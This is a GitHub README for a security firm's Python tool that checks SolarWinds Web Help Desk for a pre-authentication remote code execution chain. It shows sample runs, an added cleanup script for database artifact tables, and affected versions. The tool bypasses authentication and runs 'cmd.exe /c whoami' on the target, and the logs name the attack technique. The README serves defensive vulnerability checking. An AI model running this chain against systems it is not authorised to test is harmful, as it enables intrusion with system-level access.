watchtowrlabs/watchTowr-vs-SolarWinds-WebHelpDesk-CVE-2025-40552-CVE-2025-40553
GitHub: watchtowrlabs/watchTowr-vs-SolarWinds-WebHelpDesk-CVE-2025-40552-CVE-2025-40553
A Python detection and verification tool for the SolarWinds Web Help Desk pre-authentication RCE chain (CVE-2025-40552/40553).
Stars: 4 | Forks: 0
# CVE-2025-40552 and CVE-2025-40553 SolarWinds Web Help Desk Pre-Auth RCE Chain
Detection artifact generator tool for the SolarWinds Web Help Desk Pre-Auth RCE Chain
# Description
This detection artifact generator verifies whether a SolarWinds Web Help Desk instance is vulnerable to CVE-2025-40552 and CVE-2025-40553.
The detection artifact generator attempts two operations:
* Bypass authentication using CVE-2025-40552 - this check is highly accurate.
* If that succeeds, it tries to verify the CVE-2025-40553 RCE by executing the `cmd.exe /c whoami` command - this check is not 100% accurate, because it relies on error messages that may vary between environments.
**Note** - during the RCE test, the script creates a `SWWHDDAG` table in the `postgres` database.
After testing, you can verify that the command output is present in the database:
```
> SELECT * FROM public.swwhddagmm2t6t79
"output"
"nt authority\system"
```
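Because the artifact table name carries a random suffix (`swwhddagmm2t6t79` above, `SWWHDDAGp08zwfs6` in the run log), locating and removing leftover tables after a test is easier with a small helper. The following is an added example, not code from the watchTowr tool: it filters `information_schema.tables` rows (a constructed sample is embedded) for the `SWWHDDAG` prefix and emits quoted-identifier SQL to read the captured output and then drop each table; the schema/table pairs and the `output` column name follow the query shown above.

```python
import re

# The tool names its artifact table with the fixed SWWHDDAG prefix plus a
# random suffix (e.g. swwhddagmm2t6t79), so the exact name differs per run.
# PostgreSQL folds unquoted identifiers to lower case; match case-insensitively.
ARTIFACT_RE = re.compile(r"^swwhddag[a-z0-9]+$", re.IGNORECASE)


def find_artifact_tables(rows):
    """Filter (table_schema, table_name) rows, as returned by
    SELECT table_schema, table_name FROM information_schema.tables,
    down to the detection tool's artifact tables."""
    return [(schema, name) for schema, name in rows if ARTIFACT_RE.match(name)]


def quote_ident(name):
    """Double-quote a PostgreSQL identifier (doubling embedded quotes) so a
    table name taken from the catalog is never interpolated raw into SQL."""
    return '"' + name.replace('"', '""') + '"'


def cleanup_statements(tables):
    """For each artifact table: read the captured command output, then drop it."""
    stmts = []
    for schema, name in tables:
        fq = f"{quote_ident(schema)}.{quote_ident(name)}"
        stmts.append(f"SELECT output FROM {fq};")
        stmts.append(f"DROP TABLE {fq};")
    return stmts


# Constructed sample of information_schema.tables rows (not real data):
# two artifact tables left by separate runs among ordinary tables.
SAMPLE_ROWS = [
    ("pg_catalog", "pg_class"),
    ("public", "ticket"),
    ("public", "swwhddagmm2t6t79"),
    ("public", "SWWHDDAGp08zwfs6"),
]

if __name__ == "__main__":
    found = find_artifact_tables(SAMPLE_ROWS)
    print(f"{len(found)} artifact table(s) found")
    for stmt in cleanup_statements(found):
        print(stmt)
```

Run the emitted statements against the `postgres` database with `psql`, dropping each table only after its output has been recorded.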
# Detection in action
Test against a vulnerable instance:
```
$ python3 watchTowr-vs-SolarWinds-WebHelpDesk-CVE-2025-40552-CVE-2025-40553.py -H https://vulnerable.lab:8443
watchTowr-vs-SolarWinds-WebHelpDesk-CVE-2025-40552-CVE-2025-40553.py
(*) CVE-2025-40552 + CVE-2025-40553 Pre-Auth RCE Chain in SolarWinds Web Help Desk - Detection Artifact Generator
- Piotr Bazydlo (@chudyPB) of watchTowr
CVEs: CVE-2025-40552 and CVE-2025-40553
[+] Testing CVE-2025-40552 Authentication Bypass
[+] Triggering error and poisoning context cache with LookAndFeelPref
[+] VULNERABLE to CVE-2025-40552 Authentication Bypass
[+] Testing CVE-2025-40553 RCE
[+] This stage will create SWWHDDAGp08zwfs6 DB table if successful
[+] Verifying deserialization and serialization of org.apache.commons.dbcp2.BasicDataSource
[+] PROBABLY VULNERABLE: Connection validated and SQL queries can be executed
[+] Executing "cmd.exe /c whoami" - verify locally if it worked
```
Test against a non-vulnerable instance:
```
$ python3 watchTowr-vs-SolarWinds-WebHelpDesk-CVE-2025-40552-CVE-2025-40553.py -H https://notvulnerable.lab:8443
watchTowr-vs-SolarWinds-WebHelpDesk-CVE-2025-40552-CVE-2025-40553.py
(*) CVE-2025-40552 + CVE-2025-40553 Pre-Auth RCE Chain in SolarWinds Web Help Desk - Detection Artifact Generator
- Piotr Bazydlo (@chudyPB) of watchTowr
CVEs: CVE-2025-40552 and CVE-2025-40553
[+] Testing CVE-2025-40552 Authentication Bypass
[+] Triggering error and poisoning context cache with LookAndFeelPref
[-] NOT VULNERABLE to CVE-2025-40552, exiting
```
# Affected versions
`< SolarWinds Web Help Desk 2026.1`
Reference: https://documentation.solarwinds.com/en/success_center/whd/content/release_notes/whd_2026-1_release_notes.htm
# Follow [watchTowr](https://watchTowr.com) Labs
For the latest security research, follow the [watchTowr](https://watchTowr.com) Labs team
- https://labs.watchtowr.com/
- https://x.com/watchtowrcyber